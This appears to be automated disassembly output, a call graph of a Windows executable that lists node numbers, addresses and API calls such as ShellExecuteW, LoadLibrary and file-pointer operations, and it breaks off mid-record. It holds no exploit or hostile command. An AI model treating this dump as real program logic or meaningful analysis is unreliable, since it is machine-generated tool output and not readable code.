SetFilePointerEx 96601->96602 96603 279725 96601->96603 96604 27974e GetLastError 96602->96604 96605 27972a 96602->96605 96616 26f649 20 API calls _abort 96603->96616 96617 26f613 20 API calls 2 library calls 96604->96617 96605->96595 96608->96579 96609->96584 96610->96594 96611->96595 96612->96584 96613->96582 96614->96587 96615->96584 96616->96605 96617->96605 96618 282782 96621 242ab0 96618->96621 96622 283a1a DestroyWindow 96621->96622 96623 242aef mciSendStringW 96621->96623 96634 283a26 96622->96634 96624 242d66 96623->96624 96625 242b0b 96623->96625 96624->96625 96627 242d75 UnregisterHotKey 96624->96627 96626 242b19 96625->96626 96625->96634 96657 242ede 96626->96657 96627->96624 96629 283a6b 96635 283a8f 96629->96635 96636 283a7e FreeLibrary 96629->96636 96630 283a44 FindClose 96630->96634 96633 242b2e 96633->96635 96643 242b3c 96633->96643 96634->96629 96634->96630 96668 247aab 96634->96668 96637 283aa3 VirtualFree 96635->96637 96638 283ad1 96635->96638 96636->96629 96637->96635 96640 242ba9 96638->96640 96661 2b0b4c 96638->96661 96639 242b98 CoUninitialize 96639->96638 96639->96640 96641 242bb4 96640->96641 96642 283aeb 96640->96642 96645 242bc4 96641->96645 96649 283afa ISource 96642->96649 96672 2b3d30 6 API calls ISource 96642->96672 96643->96639 96666 242ff4 24 API calls 96645->96666 96647 242bda 96667 242e1c 22 API calls 96647->96667 96652 283b89 96649->96652 96673 2a6e3b 22 API calls ISource 96649->96673 96659 242eeb 96657->96659 96658 242b20 96658->96629 96658->96633 96659->96658 96674 2a7991 22 API calls 96659->96674 96675 2b1312 96661->96675 96664 2b0b6b 96665 2b0b7f DeleteCriticalSection 96664->96665 96665->96640 96666->96647 96669 247ac4 96668->96669 96670 247ab5 96668->96670 96669->96670 96671 247ac9 CloseHandle 96669->96671 96670->96634 96671->96670 96672->96642 96673->96649 96674->96659 96676 2b131b InterlockedExchange 96675->96676 96677 2b0b5a CloseHandle 96675->96677 96676->96677 96678 2b132f EnterCriticalSection TerminateThread WaitForSingleObject 96676->96678 96677->96664 96679 2b1369 InterlockedExchange LeaveCriticalSection 96678->96679 96680 2b135c CloseHandle 96678->96680 96679->96677 96680->96679 96681 26076b 96682 260777 ___scrt_is_nonwritable_in_current_image 96681->96682 96711 260221 96682->96711 96684 26077e 96685 2608d1 96684->96685 96689 2607a8 96684->96689 96752 260baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96685->96752 96687 2608d8 96745 2651c2 96687->96745 96699 2607e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96689->96699 96722 2727ed 96689->96722 96695 2607c7 96697 260848 96730 260cc9 96697->96730 96699->96697 96748 26518a 38 API calls 3 library calls 96699->96748 96700 26084e 96734 24331b 96700->96734 96705 26086a 96705->96687 96706 26086e 96705->96706 96707 260877 96706->96707 96750 265165 28 API calls _abort 96706->96750 96751 2603b0 13 API calls 2 library calls 96707->96751 96710 26087f 96710->96695 96712 26022a 96711->96712 96754 260a08 IsProcessorFeaturePresent 96712->96754 96714 260236 96755 263004 10 API calls 3 library calls 96714->96755 96716 26023b 96721 26023f 96716->96721 96756 272687 96716->96756 96719 260256 96719->96684 96721->96684 96724 272804 96722->96724 96723 260dfc CatchGuardHandler 5 API calls 96725 2607c1 96723->96725 96724->96723 96725->96695 96726 272791 96725->96726 96727 2727c0 96726->96727 96728 260dfc CatchGuardHandler 5 API calls 96727->96728 96729 2727e9 96728->96729 96729->96699 96812 2626b0 96730->96812 96733 260cef 96733->96700 96735 243327 IsThemeActive 96734->96735 96737 243382 96734->96737 96814 2652b3 96735->96814 96749 260d02 GetModuleHandleW 96737->96749 96738 243352 96820 265319 96738->96820 96740 243359 96827 2432e6 SystemParametersInfoW SystemParametersInfoW 96740->96827 96742 243360 96828 24338b 96742->96828 96744 243368 SystemParametersInfoW 96744->96737 97846 264f3f 96745->97846 96748->96697 96749->96705 96750->96707 96751->96710 96752->96687 96754->96714 96755->96716 96760 27d576 96756->96760 96759 26302d 8 API calls 3 library calls 96759->96721 96763 27d58f 96760->96763 96764 27d593 96760->96764 96762 260248 96762->96719 96762->96759 96784 260dfc 96763->96784 96764->96763 96767 274f6e 96764->96767 96779 274eb8 96764->96779 96768 274f7a ___scrt_is_nonwritable_in_current_image 96767->96768 96791 2732d1 EnterCriticalSection 96768->96791 96770 274f81 96792 275422 96770->96792 96772 274f90 96778 274f9f 96772->96778 96805 274e02 29 API calls 96772->96805 96775 274fb0 __fread_nolock 96775->96764 96776 274f9a 96777 274eb8 2 API calls 96776->96777 96777->96778 96806 274fbb LeaveCriticalSection _abort 96778->96806 96783 274ebf 96779->96783 96780 274f02 GetStdHandle 96780->96783 96781 274f6a 96781->96764 96782 274f15 GetFileType 96782->96783 96783->96780 96783->96781 96783->96782 96785 260e07 IsProcessorFeaturePresent 96784->96785 96786 260e05 96784->96786 96788 260fce 96785->96788 96786->96762 96811 260f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96788->96811 96790 2610b1 96790->96762 96791->96770 96793 27542e ___scrt_is_nonwritable_in_current_image 96792->96793 96794 275452 96793->96794 96795 27543b 96793->96795 96807 2732d1 EnterCriticalSection 96794->96807 96808 26f649 20 API calls _abort 96795->96808 96798 275440 96809 272b5c 26 API calls __cftof 96798->96809 96800 27544a __fread_nolock 96800->96772 96801 27545e 96803 275373 __wsopen_s 21 API calls 96801->96803 96804 27548a 96801->96804 96803->96801 96810 2754b1 LeaveCriticalSection _abort 96804->96810 96805->96776 96806->96775 96807->96801 96808->96798 96809->96800 96810->96800 96811->96790 96813 260cdc GetStartupInfoW 96812->96813 96813->96733 96815 2652bf ___scrt_is_nonwritable_in_current_image 96814->96815 96877 2732d1 EnterCriticalSection 96815->96877 96817 2652ca pre_c_initialization 96878 26530a 96817->96878 96819 2652ff __fread_nolock 96819->96738 96821 265325 96820->96821 96822 26533f 96820->96822 96821->96822 96882 26f649 20 API calls _abort 96821->96882 96822->96740 96824 26532f 96883 272b5c 26 API calls __cftof 96824->96883 96826 26533a 96826->96740 96827->96742 96829 24339b __wsopen_s 96828->96829 96830 24bf73 22 API calls 96829->96830 96831 2433a7 GetCurrentDirectoryW 96830->96831 96884 244fd9 96831->96884 96833 2433ce IsDebuggerPresent 96834 2433dc 96833->96834 96835 283ca3 MessageBoxA 96833->96835 96836 283cbb 96834->96836 96837 2433f0 96834->96837 96835->96836 97002 244176 22 API calls 96836->97002 96952 243a95 96837->96952 96841 24340f GetFullPathNameW 96844 243462 96846 283cec SetCurrentDirectoryW 96844->96846 96847 24346a 96844->96847 96846->96847 96848 243475 96847->96848 97003 2a1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 96847->97003 96984 2434d3 7 API calls 96848->96984 96851 283d07 96851->96848 96854 283d19 96851->96854 97004 245594 96854->97004 96855 24347f 96861 243494 96855->96861 96988 24396b 96855->96988 96857 283d22 96859 24b329 22 API calls 96857->96859 96862 283d30 96859->96862 96860 2434af 96867 2434b6 SetCurrentDirectoryW 96860->96867 96861->96860 96998 243907 96861->96998 96864 283d38 96862->96864 96865 283d5f 96862->96865 97011 246b7c 96864->97011 96868 246b7c 22 API calls 96865->96868 96870 2434ca 96867->96870 96871 283d5b GetForegroundWindow ShellExecuteW 96868->96871 96870->96744 96875 283d90 96871->96875 96874 283d51 96876 246b7c 22 API calls 96874->96876 96875->96860 96876->96871 96877->96817 96881 273319 LeaveCriticalSection 96878->96881 96880 265311 96880->96819 96881->96880 96882->96824 96883->96826 96885 24bf73 22 API calls 96884->96885 96886 244fef 96885->96886 97021 2463d7 96886->97021 96888 24500d 97035 24bd57 96888->97035 96891 24bed9 22 API calls 96892 24502c 96891->96892 97041 24893c 96892->97041 96895 24b329 22 API calls 96896 245045 96895->96896 96897 24be2d 40 API calls 96896->96897 96898 245055 96897->96898 96899 24b329 22 API calls 96898->96899 96900 24507b 96899->96900 96901 24be2d 40 API calls 96900->96901 96902 24508a 96901->96902 96903 24bf73 22 API calls 96902->96903 96904 2450a8 96903->96904 97044 2451ca 96904->97044 96908 2450c2 96909 2450cc 96908->96909 96910 284b23 96908->96910 96911 264d98 40 API calls 96909->96911 96912 2451ca 22 API calls 96910->96912 96913 2450d7 96911->96913 96914 284b37 96912->96914 96913->96914 96915 2450e1 96913->96915 96917 2451ca 22 API calls 96914->96917 96916 264d98 40 API calls 96915->96916 96918 2450ec 96916->96918 96919 284b53 96917->96919 96918->96919 96920 2450f6 96918->96920 96921 245594 24 API calls 96919->96921 96922 264d98 40 API calls 96920->96922 96923 284b76 96921->96923 96924 245101 96922->96924 96925 2451ca 22 API calls 96923->96925 96926 284b9f 96924->96926 96927 24510b 96924->96927 96928 284b82 96925->96928 96930 2451ca 22 API calls 96926->96930 96929 24512e 96927->96929 96932 24bed9 22 API calls 96927->96932 96931 24bed9 22 API calls 96928->96931 96934 284bda 96929->96934 97060 247e12 96929->97060 96933 284bbd 96930->96933 96935 284b90 96931->96935 96936 245121 96932->96936 96937 24bed9 22 API calls 96933->96937 96940 2451ca 22 API calls 96935->96940 96941 2451ca 22 API calls 96936->96941 96942 284bcb 96937->96942 96940->96926 96941->96929 96944 2451ca 22 API calls 96942->96944 96944->96934 96947 24893c 22 API calls 96949 245167 96947->96949 96948 248a60 22 API calls 96948->96949 96949->96947 96949->96948 96950 2451ab 96949->96950 96951 2451ca 22 API calls 96949->96951 96950->96833 96951->96949 96953 243aa2 __wsopen_s 96952->96953 96954 243abb 96953->96954 96955 2840da ___scrt_fastfail 96953->96955 97107 245851 96954->97107 96957 2840f6 GetOpenFileNameW 96955->96957 96959 284145 96957->96959 96962 248577 22 API calls 96959->96962 96964 28415a 96962->96964 96964->96964 96965 243ad9 97135 2462d5 96965->97135 97786 243624 7 API calls 96984->97786 96986 24347a 96987 2435b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96986->96987 96987->96855 96989 243996 ___scrt_fastfail 96988->96989 97787 245f32 96989->97787 96992 243a1c 96994 2840cd Shell_NotifyIconW 96992->96994 96995 243a3a Shell_NotifyIconW 96992->96995 97791 2461a9 96995->97791 96997 243a50 96997->96861 96999 243969 96998->96999 97000 243919 ___scrt_fastfail 96998->97000 96999->96860 97001 243938 Shell_NotifyIconW 97000->97001 97001->96999 97002->96844 97003->96851 97005 2822d0 __wsopen_s 97004->97005 97006 2455a1 GetModuleFileNameW 97005->97006 97007 24b329 22 API calls 97006->97007 97008 2455c7 97007->97008 97009 245851 23 API calls 97008->97009 97010 2455d1 97009->97010 97010->96857 97012 2857fe 97011->97012 97013 246b93 97011->97013 97015 26014b 22 API calls 97012->97015 97831 246ba4 97013->97831 97017 285808 _wcslen 97015->97017 97016 246b9e 97020 247bb5 22 API calls 97016->97020 97018 26017b 22 API calls 97017->97018 97019 285841 __fread_nolock 97018->97019 97020->96874 97022 2463e4 __wsopen_s 97021->97022 97023 248577 22 API calls 97022->97023 97024 246416 97022->97024 97023->97024 97034 24644c 97024->97034 97082 24655e 97024->97082 97026 24655e 22 API calls 97026->97034 97027 24b329 22 API calls 97028 246543 97027->97028 97030 246a7c 22 API calls 97028->97030 97029 24b329 22 API calls 97029->97034 97032 24654f 97030->97032 97032->96888 97033 24651a 97033->97027 97033->97032 97034->97026 97034->97029 97034->97033 97085 246a7c 97034->97085 97036 245021 97035->97036 97037 24bd71 97035->97037 97036->96891 97038 26014b 22 API calls 97037->97038 97039 24bd7b 97038->97039 97040 26017b 22 API calls 97039->97040 97040->97036 97042 26014b 22 API calls 97041->97042 97043 245038 97042->97043 97043->96895 97045 2451f2 97044->97045 97047 2451d4 97044->97047 97046 248577 22 API calls 97045->97046 97048 2450b4 97046->97048 97047->97048 97049 24bed9 22 API calls 97047->97049 97050 264d98 97048->97050 97049->97048 97051 264da6 97050->97051 97052 264e1b 97050->97052 97059 264dcb 97051->97059 97091 26f649 20 API calls _abort 97051->97091 97093 264e2d 40 API calls 2 library calls 97052->97093 97055 264e28 97055->96908 97056 264db2 97092 272b5c 26 API calls __cftof 97056->97092 97058 264dbd 97058->96908 97059->96908 97061 247e1a 97060->97061 97062 26014b 22 API calls 97061->97062 97063 247e28 97062->97063 97094 248445 97063->97094 97066 248470 97097 24c760 97066->97097 97068 248480 97069 26017b 22 API calls 97068->97069 97070 24514c 97068->97070 97069->97070 97071 248a60 97070->97071 97072 248a76 97071->97072 97073 286737 97072->97073 97079 248a80 97072->97079 97105 25b7a2 22 API calls 97073->97105 97074 286744 97106 24b4c8 22 API calls 97074->97106 97077 286762 97077->97077 97078 248b94 97080 26014b 22 API calls 97078->97080 97079->97074 97079->97078 97081 248b9b 97079->97081 97080->97081 97081->96949 97083 24c2c9 22 API calls 97082->97083 97084 246569 97083->97084 97084->97024 97086 246a8b 97085->97086 97090 246aac __fread_nolock 97085->97090 97088 26017b 22 API calls 97086->97088 97087 26014b 22 API calls 97089 246abf 97087->97089 97088->97090 97089->97034 97090->97087 97091->97056 97092->97058 97093->97055 97095 26014b 22 API calls 97094->97095 97096 24513e 97095->97096 97096->97066 97098 24c76b 97097->97098 97099 291285 97098->97099 97104 24c773 ISource 97098->97104 97100 26014b 22 API calls 97099->97100 97101 291291 97100->97101 97102 24c77a 97102->97068 97103 24c7e0 22 API calls 97103->97104 97104->97102 97104->97103 97105->97074 97106->97077 97165 2822d0 97107->97165 97110 24587d 97112 248577 22 API calls 97110->97112 97111 245898 97113 24bd57 22 API calls 97111->97113 97114 245889 97112->97114 97113->97114 97167 2455dc 97114->97167 97117 243a57 97118 2822d0 __wsopen_s 97117->97118 97119 243a64 GetLongPathNameW 97118->97119 97120 248577 22 API calls 97119->97120 97121 243a8c 97120->97121 97122 2453f2 97121->97122 97123 24bf73 22 API calls 97122->97123 97124 245404 97123->97124 97125 245851 23 API calls 97124->97125 97126 24540f 97125->97126 97127 284d5b 97126->97127 97128 24541a 97126->97128 97132 284d7d 97127->97132 97177 25e36b 41 API calls 97127->97177 97129 246a7c 22 API calls 97128->97129 97131 245426 97129->97131 97171 241340 97131->97171 97134 245439 97134->96965 97178 246679 97135->97178 97138 285336 97303 2b36b8 97138->97303 97139 246679 94 API calls 97142 24630e 97139->97142 97141 285347 97143 285368 97141->97143 97144 28534b 97141->97144 97142->97138 97145 246316 97142->97145 97147 26017b 22 API calls 97143->97147 97352 2466e7 97144->97352 97148 246322 97145->97148 97149 285353 97145->97149 97158 2853ad 97147->97158 97200 243b39 97148->97200 97358 2ae30e 82 API calls 97149->97358 97152 285361 97152->97143 97153 243407 97153->96841 97153->96844 97154 28555e 97156 285566 97154->97156 97155 2466e7 68 API calls 97155->97156 97156->97155 97360 2aa215 82 API calls __wsopen_s 97156->97360 97158->97154 97158->97156 97162 24b329 22 API calls 97158->97162 97329 2a9ff8 97158->97329 97332 2b1519 97158->97332 97338 24bba9 97158->97338 97346 245d21 97158->97346 97359 2a9f27 42 API calls _wcslen 97158->97359 97162->97158 97166 24585e GetFullPathNameW 97165->97166 97166->97110 97166->97111 97168 2455ea 97167->97168 97169 24adf4 22 API calls 97168->97169 97170 243ac4 97169->97170 97170->97117 97172 241371 __fread_nolock 97171->97172 97173 241352 97171->97173 97174 26014b 22 API calls 97172->97174 97175 26017b 22 API calls 97173->97175 97176 241388 97174->97176 97175->97172 97176->97134 97177->97127 97361 24663e LoadLibraryA 97178->97361 97183 285648 97185 2466e7 68 API calls 97183->97185 97184 2466a4 LoadLibraryExW 97369 246607 LoadLibraryA 97184->97369 97188 28564f 97185->97188 97190 246607 3 API calls 97188->97190 97192 285657 97190->97192 97191 2466ce 97191->97192 97193 2466da 97191->97193 97390 24684a 97192->97390 97194 2466e7 68 API calls 97193->97194 97196 2462fa 97194->97196 97196->97138 97196->97139 97199 28567e 97201 243b62 97200->97201 97202 28415f 97200->97202 97204 26017b 22 API calls 97201->97204 97636 2aa215 82 API calls __wsopen_s 97202->97636 97205 243b86 97204->97205 97206 247aab CloseHandle 97205->97206 97207 243b94 97206->97207 97208 24bf73 22 API calls 97207->97208 97209 243b9d 97208->97209 97212 247aab CloseHandle 97209->97212 97210 243bfa 97214 24bf73 22 API calls 97210->97214 97211 243bec 97211->97210 97213 284179 97211->97213 97637 2ad5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97211->97637 97216 243ba6 97212->97216 97213->97210 97213->97211 97215 243c06 97214->97215 97610 243ae9 97215->97610 97219 247aab CloseHandle 97216->97219 97222 243baf 97219->97222 97220 2841d5 97220->97210 97624 246fa2 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 97222->97624 97223 24bf73 22 API calls 97225 243c1e 97223->97225 97227 245851 23 API calls 97225->97227 97226 243bc9 97228 243bd1 97226->97228 97229 284591 97226->97229 97230 243c2c 97227->97230 97625 246c5f 27 API calls ISource 97228->97625 97649 2aa215 82 API calls __wsopen_s 97229->97649 97615 243b1c 97230->97615 97233 2845a6 97233->97233 97237 243be3 97626 246c48 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97237->97626 97240 243c6f 97242 24bf73 22 API calls 97240->97242 97241 2841eb 97243 247aab CloseHandle 97241->97243 97244 243c78 97242->97244 97245 2841f4 97243->97245 97246 24bf73 22 API calls 97244->97246 97247 246679 94 API calls 97245->97247 97248 243c81 97246->97248 97250 28421c 97247->97250 97627 24568e 22 API calls 97248->97627 97252 284528 97250->97252 97255 2b36b8 80 API calls 97250->97255 97251 243c98 97628 247bb5 22 API calls 97251->97628 97646 2aa215 82 API calls __wsopen_s 97252->97646 97257 28423b 97255->97257 97256 243ca9 SetCurrentDirectoryW 97262 243cbc 97256->97262 97258 2466e7 68 API calls 97257->97258 97259 284249 97258->97259 97259->97252 97260 284251 97259->97260 97261 26014b 22 API calls 97260->97261 97263 284279 97261->97263 97264 26017b 22 API calls 97262->97264 97269 24bba9 22 API calls 97263->97269 97265 243ccf 97264->97265 97267 24423c 22 API calls 97265->97267 97266 247aab CloseHandle 97268 243e5c 97266->97268 97283 243cda ISource _wcslen 97267->97283 97270 247aab CloseHandle 97268->97270 97285 2842ba 97269->97285 97274 243e6e 97270->97274 97272 243e07 97274->97153 97283->97272 97284 284574 97283->97284 97288 243e2a ISource 97288->97266 97302 284516 97302->97288 97304 2b36d4 97303->97304 97305 246874 64 API calls 97304->97305 97306 2b36e8 97305->97306 97658 2b3827 97306->97658 97309 24684a 40 API calls 97310 2b3717 97309->97310 97311 24684a 40 API calls 97310->97311 97312 2b3727 97311->97312 97313 24684a 40 API calls 97312->97313 97314 2b3742 97313->97314 97315 24684a 40 API calls 97314->97315 97316 2b375d 97315->97316 97317 246874 64 API calls 97316->97317 97318 2b3774 97317->97318 97319 26ed7c ___std_exception_copy 21 API calls 97318->97319 97320 2b377b 97319->97320 97321 26ed7c ___std_exception_copy 21 API calls 97320->97321 97322 2b3785 97321->97322 97323 24684a 40 API calls 97322->97323 97324 2b3799 97323->97324 97325 2b32bd 27 API calls 97324->97325 97327 2b37af 97325->97327 97326 2b3700 97326->97141 97327->97326 97664 2b2c8d 97327->97664 97330 26017b 22 API calls 97329->97330 97331 2aa028 __fread_nolock 97330->97331 97331->97158 97333 2b1524 97332->97333 97334 26014b 22 API calls 97333->97334 97335 2b153b 97334->97335 97336 24b329 22 API calls 97335->97336 97337 2b1546 97336->97337 97337->97158 97339 24bc33 97338->97339 97345 24bbb9 __fread_nolock 97338->97345 97342 26017b 22 API calls 97339->97342 97340 26014b 22 API calls 97341 24bbc0 97340->97341 97343 24bbde 97341->97343 97344 26014b 22 API calls 97341->97344 97342->97345 97343->97158 97344->97343 97345->97340 97347 245d34 97346->97347 97349 245dd8 97346->97349 97348 26017b 22 API calls 97347->97348 97351 245d66 97347->97351 97348->97351 97349->97158 97350 26014b 22 API calls 97350->97351 97351->97349 97351->97350 97353 2466f1 97352->97353 97354 2466f8 97352->97354 97355 26e9e8 67 API calls 97353->97355 97356 24670f 97354->97356 97357 2856a4 FreeLibrary 97354->97357 97355->97354 97356->97149 97358->97152 97359->97158 97360->97156 97362 246674 97361->97362 97363 246656 GetProcAddress 97361->97363 97366 26e95b 97362->97366 97364 246666 97363->97364 97364->97362 97365 24666d FreeLibrary 97364->97365 97365->97362 97398 26e89a 97366->97398 97368 246698 97368->97183 97368->97184 97370 24661c GetProcAddress 97369->97370 97371 24663b 97369->97371 97372 24662c 97370->97372 97374 246720 97371->97374 97372->97371 97373 246634 FreeLibrary 97372->97373 97373->97371 97375 26017b 22 API calls 97374->97375 97376 246735 97375->97376 97450 24423c 97376->97450 97378 246741 __fread_nolock 97379 2856c2 97378->97379 97383 24677c 97378->97383 97458 2b3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 97378->97458 97459 2b3a92 74 API calls 97379->97459 97382 24684a 40 API calls 97382->97383 97383->97382 97385 246810 ISource 97383->97385 97386 285706 97383->97386 97387 246874 64 API calls 97383->97387 97385->97191 97453 246874 97386->97453 97387->97383 97389 24684a 40 API calls 97389->97385 97391 285760 97390->97391 97392 24685c 97390->97392 97491 26ec34 97392->97491 97395 2b32bd 97593 2b310d 97395->97593 97397 2b32d8 97397->97199 97401 26e8a6 ___scrt_is_nonwritable_in_current_image 97398->97401 97399 26e8b4 97423 26f649 20 API calls _abort 97399->97423 97401->97399 97402 26e8e4 97401->97402 97404 26e8f6 97402->97404 97405 26e8e9 97402->97405 97403 26e8b9 97424 272b5c 26 API calls __cftof 97403->97424 97415 2783e1 97404->97415 97425 26f649 20 API calls _abort 97405->97425 97409 26e8ff 97410 26e905 97409->97410 97412 26e912 97409->97412 97426 26f649 20 API calls _abort 97410->97426 97427 26e944 LeaveCriticalSection __fread_nolock 97412->97427 97414 26e8c4 __fread_nolock 97414->97368 97416 2783ed ___scrt_is_nonwritable_in_current_image 97415->97416 97428 2732d1 EnterCriticalSection 97416->97428 97418 2783fb 97429 27847b 97418->97429 97422 27842c __fread_nolock 97422->97409 97423->97403 97424->97414 97425->97414 97426->97414 97427->97414 97428->97418 97430 27849e 97429->97430 97431 2784f7 97430->97431 97438 278408 97430->97438 97445 2694fd EnterCriticalSection 97430->97445 97446 269511 LeaveCriticalSection 97430->97446 97432 274ff0 _abort 20 API calls 97431->97432 97434 278500 97432->97434 97435 272d38 _free 20 API calls 97434->97435 97436 278509 97435->97436 97436->97438 97447 273778 11 API calls 2 library calls 97436->97447 97442 278437 97438->97442 97439 278528 97448 2694fd EnterCriticalSection 97439->97448 97449 273319 LeaveCriticalSection 97442->97449 97444 27843e 97444->97422 97445->97430 97446->97430 97447->97439 97448->97438 97449->97444 97451 26014b 22 API calls 97450->97451 97452 24424e 97451->97452 97452->97378 97454 246883 97453->97454 97455 285780 97453->97455 97460 26f053 97454->97460 97458->97379 97459->97383 97463 26ee1a 97460->97463 97462 246891 97462->97389 97464 26ee26 ___scrt_is_nonwritable_in_current_image 97463->97464 97465 26ee32 97464->97465 97466 26ee58 97464->97466 97488 26f649 20 API calls _abort 97465->97488 97476 2694fd EnterCriticalSection 97466->97476 97468 26ee37 97489 272b5c 26 API calls __cftof 97468->97489 97471 26ee64 97477 26ef7a 97471->97477 97473 26ee78 97490 26ee97 LeaveCriticalSection __fread_nolock 97473->97490 97475 26ee42 __fread_nolock 97475->97462 97476->97471 97478 26ef9c 97477->97478 97479 26ef8c 97477->97479 97481 26eea1 28 API calls 97478->97481 97480 26f649 _free 20 API calls 97479->97480 97482 26ef91 97480->97482 97483 26efbf 97481->97483 97482->97473 97484 26df7b 62 API calls 97483->97484 97487 26f03e 97483->97487 97485 26efe6 97484->97485 97486 2797a4 __wsopen_s 28 API calls 97485->97486 97486->97487 97487->97473 97488->97468 97489->97475 97490->97475 97494 26ec51 97491->97494 97493 24686d 97493->97395 97495 26ec5d ___scrt_is_nonwritable_in_current_image 97494->97495 97496 26ec95 __fread_nolock 97495->97496 97497 26ec70 ___scrt_fastfail 97495->97497 97498 26ec9d 97495->97498 97496->97493 97521 26f649 20 API calls _abort 97497->97521 97507 2694fd EnterCriticalSection 97498->97507 97500 26eca7 97508 26ea68 97500->97508 97503 26ec8a 97522 272b5c 26 API calls __cftof 97503->97522 97507->97500 97509 26ea7a ___scrt_fastfail 97508->97509 97514 26ea97 97508->97514 97510 26ea87 97509->97510 97509->97514 97519 26eada __fread_nolock 97509->97519 97589 26f649 20 API calls _abort 97510->97589 97512 26ea8c 97590 272b5c 26 API calls __cftof 97512->97590 97523 26ecdc LeaveCriticalSection __fread_nolock 97514->97523 97515 26ebf6 ___scrt_fastfail 97592 26f649 20 API calls _abort 97515->97592 97517 26dcc5 __fread_nolock 26 API calls 97517->97519 97519->97514 97519->97515 97519->97517 97524 2790c5 97519->97524 97591 26d2e8 26 API calls 4 library calls 97519->97591 97521->97503 97522->97496 97523->97496 97525 2790d7 97524->97525 97526 2790ef 97524->97526 97527 26f636 __dosmaperr 20 API calls 97525->97527 97528 279459 97526->97528 97533 279134 97526->97533 97529 2790dc 97527->97529 97530 26f636 __dosmaperr 20 API calls 97528->97530 97531 26f649 _free 20 API calls 97529->97531 97532 27945e 97530->97532 97534 2790e4 97531->97534 97535 26f649 _free 20 API calls 97532->97535 97533->97534 97536 27913f 97533->97536 97542 27916f 97533->97542 97534->97519 97541 27914c 97535->97541 97537 26f636 __dosmaperr 20 API calls 97536->97537 97538 279144 97537->97538 97539 26f649 _free 20 API calls 97538->97539 97539->97541 97540 272b5c __cftof 26 API calls 97540->97534 97541->97540 97543 279188 97542->97543 97544 2791ae 97542->97544 97545 2791ca 97542->97545 97543->97544 97549 279195 97543->97549 97546 26f636 __dosmaperr 20 API calls 97544->97546 97547 273b93 __fread_nolock 21 API calls 97545->97547 97548 2791b3 97546->97548 97550 2791e1 97547->97550 97552 26f649 _free 20 API calls 97548->97552 97551 27fc1b __fread_nolock 26 API calls 97549->97551 97553 272d38 _free 20 API calls 97550->97553 97554 279333 97551->97554 97555 2791ba 97552->97555 97556 2791ea 97553->97556 97557 2793a9 97554->97557 97559 27934c GetConsoleMode 97554->97559 97558 272b5c __cftof 26 API calls 97555->97558 97560 272d38 _free 20 API calls 97556->97560 97561 2793ad ReadFile 97557->97561 97586 2791c5 __fread_nolock 97558->97586 97559->97557 97562 27935d 97559->97562 97563 2791f1 97560->97563 97564 2793c7 97561->97564 97565 279421 GetLastError 97561->97565 97562->97561 97566 279363 ReadConsoleW 97562->97566 97567 279216 97563->97567 97568 2791fb 97563->97568 97564->97565 97571 27939e 97564->97571 97569 279385 97565->97569 97570 27942e 97565->97570 97566->97571 97573 27937f GetLastError 97566->97573 97572 2797a4 __wsopen_s 28 API calls 97567->97572 97575 26f649 _free 20 API calls 97568->97575 97578 26f613 __dosmaperr 20 API calls 97569->97578 97569->97586 97576 26f649 _free 20 API calls 97570->97576 97581 279403 97571->97581 97582 2793ec 97571->97582 97571->97586 97572->97549 97573->97569 97574 272d38 _free 20 API calls 97574->97534 97579 279200 97575->97579 97577 279433 97576->97577 97580 26f636 __dosmaperr 20 API calls 97577->97580 97578->97586 97583 26f636 __dosmaperr 20 API calls 97579->97583 97580->97586 97585 27941a 97581->97585 97581->97586 97584 278de1 __fread_nolock 31 API calls 97582->97584 97583->97586 97584->97586 97587 278c21 __fread_nolock 29 API calls 97585->97587 97586->97574 97588 27941f 97587->97588 97588->97586 97589->97512 97590->97514 97591->97519 97592->97512 97596 26e858 97593->97596 97595 2b311c 97595->97397 97599 26e7d9 97596->97599 97598 26e875 97598->97595 97600 26e7fc 97599->97600 97601 26e7e8 97599->97601 97606 26e7f8 __alldvrm 97600->97606 97609 2736b2 11 API calls 2 library calls 97600->97609 97607 26f649 20 API calls _abort 97601->97607 97603 26e7ed 97608 272b5c 26 API calls __cftof 97603->97608 97606->97598 97607->97603 97608->97606 97609->97606 97611 2822d0 __wsopen_s 97610->97611 97612 243af6 GetCurrentDirectoryW 97611->97612 97613 248577 22 API calls 97612->97613 97614 243b19 97613->97614 97614->97223 97650 24b120 97615->97650 97618 246d47 97623 246d5e 97618->97623 97619 246de5 SetFilePointerEx SetFilePointerEx 97621 243c5e 97619->97621 97620 28592a SetFilePointerEx 97621->97240 97621->97241 97622 285919 97622->97620 97623->97619 97623->97620 97623->97621 97623->97622 97624->97226 97625->97237 97626->97211 97627->97251 97628->97256 97636->97211 97637->97220 97646->97302 97649->97233 97651 24b12e 97650->97651 97652 24b19b 97650->97652 97654 243b2d 97651->97654 97655 24b16c ReadFile 97651->97655 97657 25f18b SetFilePointerEx 97652->97657 97654->97618 97655->97654 97656 24b186 97655->97656 97656->97651 97656->97654 97657->97651 97662 2b383b 97658->97662 97659 2b36fc 97659->97309 97659->97326 97660 24684a 40 API calls 97660->97662 97661 2b32bd 27 API calls 97661->97662 97662->97659 97662->97660 97662->97661 97663 246874 64 API calls 97662->97663 97663->97662 97665 2b2c98 97664->97665 97666 2b2ca6 97664->97666 97667 26e95b 29 API calls 97665->97667 97668 26e95b 29 API calls 97666->97668 97669 2b2ceb 97666->97669 97692 2b2caf 97666->97692 97667->97666 97670 2b2cd0 97668->97670 97693 2b2f16 40 API calls __fread_nolock 97669->97693 97670->97669 97672 2b2cd9 97670->97672 97672->97692 97701 26e9e8 97672->97701 97673 2b2d2f 97674 2b2d33 97673->97674 97675 2b2d54 97673->97675 97678 2b2d40 97674->97678 97680 26e9e8 67 API calls 97674->97680 97694 2b2b30 97675->97694 97681 26e9e8 67 API calls 97678->97681 97678->97692 97679 2b2d5c 97682 2b2d82 97679->97682 97683 2b2d62 97679->97683 97680->97678 97681->97692 97692->97326 97693->97673 97695 26ed7c ___std_exception_copy 21 API calls 97694->97695 97696 2b2b3e 97695->97696 97697 26ed7c ___std_exception_copy 21 API calls 97696->97697 97698 2b2b4f 97697->97698 97699 